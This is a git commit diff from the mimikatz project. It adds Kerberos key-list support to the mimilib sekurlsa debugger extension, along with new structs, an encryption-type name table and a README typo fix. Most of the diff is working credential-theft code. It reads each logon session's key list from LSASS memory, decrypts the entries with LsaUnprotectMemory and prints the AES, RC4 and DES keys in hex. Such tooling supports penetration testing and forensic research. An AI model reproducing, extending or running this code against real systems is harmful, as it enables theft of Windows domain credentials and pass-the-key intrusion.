Kerberos key list for mimilib

2025-02-15 08:56:59 +00:00 · 2014-05-09 01:04:09 +02:00 · 2014-05-09 01:04:09 +02:00 · 3b0b875fe8
commit 3b0b875fe8
parent c509bbfbf7
7 changed files with 93 additions and 3 deletions
--- a/README.md
+++ b/README.md
@ -120,4 +120,4 @@ CC BY 3.0 FR licence - http://creativecommons.org/licenses/by/3.0/fr/
 ## Author
 Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )

-This is a **personal** developpement, please respect its philosophy and don't use it for bad things!
+This is a **personal** development, please respect its philosophy and don't use it for bad things!
--- a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.c
+++ b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.c
@ -52,6 +52,9 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlo
 {
 	KIWI_KERBEROS_LOGON_SESSION session;
 	UNICODE_STRING pinCode;
+	KIWI_KERBEROS_KEYS_LIST_6 keyList;
+	PKERB_HASHPASSWORD_6 pHashPassword;
+	DWORD i;
 	ULONG_PTR ptr;
 	if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier), pData->LogonId))
 	{
@ -61,6 +64,18 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlo
 			if(session.pinCode)
 				if(ReadMemory((ULONG_PTR) session.pinCode, &pinCode, sizeof(UNICODE_STRING), NULL))
 					kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
+			if(session.pKeyList)
+				if(ReadMemory((ULONG_PTR) session.pKeyList, &keyList, sizeof(KIWI_KERBEROS_KEYS_LIST_6) - sizeof(KERB_HASHPASSWORD_6), NULL))
+					if(pHashPassword = (PKERB_HASHPASSWORD_6) LocalAlloc(LPTR, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6)))
+					{
+						if(ReadMemory((ULONG_PTR) session.pKeyList + sizeof(KIWI_KERBEROS_KEYS_LIST_6) - sizeof(KERB_HASHPASSWORD_6), pHashPassword, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6), NULL))
+						{
+							dprintf("\n\t * Key List");
+							for(i = 0; i < keyList.cbItem; i++)
+								kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (pHashPassword + i), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST);
+						}
+						LocalFree(pHashPassword);
+					}
 		}
 	}
 	else dprintf("KO");
--- a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h
+++ b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h
@ -57,6 +57,24 @@ typedef struct _RPCE_CREDENTIAL_KEYCREDENTIAL {
 	MARSHALL_KEY key[ANYSIZE_ARRAY];
 } RPCE_CREDENTIAL_KEYCREDENTIAL, *PRPCE_CREDENTIAL_KEYCREDENTIAL;

+typedef struct _KERB_HASHPASSWORD_6 {
+	LSA_UNICODE_STRING salt;	// http://tools.ietf.org/html/rfc3962
+	PVOID stringToKey; // AES Iterations (dword ?)
+	DWORD Type;
+	SIZE_T Size;
+	PBYTE Checksump;
+} KERB_HASHPASSWORD_6, *PKERB_HASHPASSWORD_6;
+
+typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
+	DWORD unk0;		// dword_1233EC8 dd 4
+	DWORD cbItem;	// debug048:01233ECC dd 5
+	PVOID unk1;
+	PVOID unk2;
+	PVOID unk3;
+	PVOID unk4;
+	KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY];
+} KIWI_KERBEROS_KEYS_LIST_6, *PKIWI_KERBEROS_KEYS_LIST_6;
+
 typedef struct _KIWI_KERBEROS_LOGON_SESSION
 {
 	ULONG		UsageCount;
@ -87,7 +105,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION
 	PVOID		unk19;
 	PVOID		unk20;
 	PVOID		unk21;
-	PVOID		unk22;
+	PKIWI_KERBEROS_KEYS_LIST_6	pKeyList;
 	PVOID		unk23;
 	LIST_ENTRY	Tickets_1;
 	FILETIME	unk24;
--- a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.c
+++ b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.c
@ -180,4 +180,40 @@ BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid)
 			status = ReadMemory(buffer, *pSid, sizeSid, NULL);
 	}
 	return status;
+}
+
+PCSTR kuhl_m_kerberos_ticket_etype(LONG eType)
+{
+	PCSTR type;
+	switch(eType)
+	{
+	case KERB_ETYPE_NULL:							type = "null             "; break;
+
+	case KERB_ETYPE_DES_PLAIN:						type = "des_plain        "; break;
+	case KERB_ETYPE_DES_CBC_CRC:					type = "des_cbc_crc      "; break;
+	case KERB_ETYPE_DES_CBC_MD4:					type = "des_cbc_md4      "; break;
+	case KERB_ETYPE_DES_CBC_MD5:					type = "des_cbc_md5      "; break;
+	case KERB_ETYPE_DES_CBC_MD5_NT:					type = "des_cbc_md5_nt   "; break;
+
+	case KERB_ETYPE_RC4_PLAIN:						type = "rc4_plain        "; break;
+	case KERB_ETYPE_RC4_PLAIN2:						type = "rc4_plain2       "; break;
+	case KERB_ETYPE_RC4_PLAIN_EXP:					type = "rc4_plain_exp    "; break;
+	case KERB_ETYPE_RC4_LM:							type = "rc4_lm           "; break;
+	case KERB_ETYPE_RC4_MD4:						type = "rc4_md4          "; break;
+	case KERB_ETYPE_RC4_SHA:						type = "rc4_sha          "; break;
+	case KERB_ETYPE_RC4_HMAC_NT:					type = "rc4_hmac_nt      "; break;
+	case KERB_ETYPE_RC4_HMAC_NT_EXP:				type = "rc4_hmac_nt_exp  "; break;
+	case KERB_ETYPE_RC4_PLAIN_OLD:					type = "rc4_plain_old    "; break;
+	case KERB_ETYPE_RC4_PLAIN_OLD_EXP:				type = "rc4_plain_old_exp"; break;
+	case KERB_ETYPE_RC4_HMAC_OLD:					type = "rc4_hmac_old     "; break;
+	case KERB_ETYPE_RC4_HMAC_OLD_EXP:				type = "rc4_hmac_old_exp "; break;
+
+	case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96_PLAIN:	type = "aes128_hmac_plain"; break;
+	case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96_PLAIN:	type = "aes256_hmac_plain"; break;
+	case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96:		type = "aes128_hmac      "; break;
+	case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96:		type = "aes256_hmac      "; break;
+
+	default:										type = "unknow           "; break;
+	}
+	return type;
 }
--- a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h
+++ b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h
@ -247,4 +247,5 @@ void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime);
 void kull_m_string_displayGUID(IN LPCGUID pGuid);
 void kull_m_string_displaySID(IN PSID pSid);
 BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString);
-BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
+BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
+PCSTR kuhl_m_kerberos_ticket_etype(LONG eType);
--- a/mimilib/sekurlsadbg/kwindbg.c
+++ b/mimilib/sekurlsadbg/kwindbg.c
@ -193,6 +193,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 	PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
 	PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
 	PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
+	PKERB_HASHPASSWORD_6 pHashPassword;
+	UNICODE_STRING buffer;
 	PVOID base;
 	DWORD type, i;

@ -256,6 +258,23 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 				}
 			}
 		}
+		else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
+		{
+			pHashPassword = (PKERB_HASHPASSWORD_6) mesCreds;
+			dprintf("\n\t\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
+			if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size)
+			{
+				buffer.Buffer = (PWSTR) pHashPassword->Checksump;
+				if(kull_m_string_getDbgUnicodeString(&buffer))
+				{
+					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
+						kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer.Buffer, buffer.MaximumLength);
+					kull_m_string_dprintf_hex(buffer.Buffer, buffer.Length, 0);
+					LocalFree(buffer.Buffer);
+				}
+			}
+			else dprintf("<no size, buffer is incorrect>");
+		}
 		else
 		{
 			if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
--- a/mimilib/sekurlsadbg/kwindbg.h
+++ b/mimilib/sekurlsadbg/kwindbg.h
@ -19,6 +19,7 @@ USHORT NtBuildNumber;
 #define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY	0x02000000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK	0x07000000

+#define KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST		0x00200000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS		0x00400000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE			0x00800000